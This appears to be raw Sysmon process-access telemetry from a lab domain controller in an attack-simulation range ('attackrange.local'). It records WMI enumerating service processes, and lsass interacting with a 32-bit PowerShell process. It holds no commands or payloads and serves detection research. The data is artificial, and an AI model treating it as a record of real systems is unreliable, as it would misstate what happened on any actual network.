16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-4985-6008-0B00-00000000A301}856912C:\Windows\system32\lsass.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-4985-6008-0B00-00000000A301}856912C:\Windows\system32\lsass.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.754{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 